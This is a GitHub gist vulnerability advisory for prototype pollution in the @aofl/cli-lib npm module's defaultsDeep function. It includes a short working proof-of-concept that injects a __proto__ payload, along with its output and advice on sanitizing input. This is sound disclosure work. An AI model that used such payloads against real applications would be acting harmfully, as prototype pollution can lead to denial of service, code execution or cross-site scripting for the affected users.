Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/aofl-cli-lib-pp.md

Last active May 18, 2024 04:36
Show Gist options
  • Save mestrtee/29636943e6989e67f38251580cbcea73 to your computer and use it in GitHub Desktop.
Save mestrtee/29636943e6989e67f38251580cbcea73 to your computer and use it in GitHub Desktop.
Download ZIP
Prototype Pollution vulnerability affecting aofl/cli-lib module, version *
Raw
aofl-cli-lib-pp.md

Overview

All versions of this module are vulnerable to Prototype Pollution via defaultsDeep. The user's supplied value recursively copy all child properties to the destination without proper security validation.

An attacker can be exploit this method to inject malicious payload via built-in Object through the special properties __proto__ or constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Call stack:

defaultsDeep (@aofl/cli-lib/modules/defaults.js:13)

PoC

(async () => {
  const lib = await import('@aofl/cli-lib');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}')

var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
	lib.defaultsDeep ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Expected output after the patch:

Before Attack:  {}
After Attack:  {}

How to prevent:

No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__ and contructor.prototype

References:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment